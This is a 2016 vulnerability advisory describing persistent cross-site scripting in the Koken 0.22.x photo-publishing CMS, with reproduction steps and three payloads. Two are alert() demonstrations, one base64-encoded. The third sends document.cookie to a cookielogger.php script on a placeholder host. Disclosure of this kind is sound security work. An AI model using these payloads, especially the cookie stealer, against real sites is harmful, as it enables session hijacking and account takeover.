____ _ _____
| _ \ | | / ____|
| |_) |_ _| |__ ___| (___ ___ ___
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|
| |_) | |_| | | | | (_) |___) | __/ (__
|____/ \__,_|_| |_|\___/_____/ \___|\___|
Document Title:
===============
Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities
Credits & Authors:
==================
TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com]
Release Date:
=============
2016-24-11
Product & Service Introduction:
===============================
Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display.
Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required.
Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation.
Abstract Advisory Information:
==============================
An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11
Vulnerability Disclosure Timeline:
==================================
2016-24-11: Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Koken - Creative website publishing
Product: Koken 0.22.7 & 0.22.11
http://koken.me/
Exploitation Technique:
=======================
Local
Severity Level:
===============
medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer
Request Method(s):
[+] Export
Vulnerable Module(s):
[+] Add Label Links
Vulnerable Parameter(s):
[+] Label Link Box
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Add new user o use account admin
2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/
3. On the menu Site > click to add Links/Footer or Links/Primary
4. In the section Label Links add you script
4. Successful reproduce of the persistent vulnerability!
Proof of Concept (IMAGES):
==========================
1. http://i.imgur.com/AAcFkwP.png
2. http://i.imgur.com/d7LuGLN.png
Vulnerability Code
=======================
<a data-bind="css: { 'front-page': $data.front && front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto && $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden"> / hidden</span>)</span></span></a>
PoC_1: Persistent Cross Site Scripting / Path / Footer
======================================================
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
PoC_2: Persistent Cross Site Scripting / Path / Primaty
=======================================================
<script>alert(String.fromCharCode(88,83,83))</script>
PoC_3:Hijacking Vulnerability / Path/ Any
=======================================================
<script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script>
Security Risk:
==============
The security risk of the persistent input validation vulnerability in the name value is estimated as medium.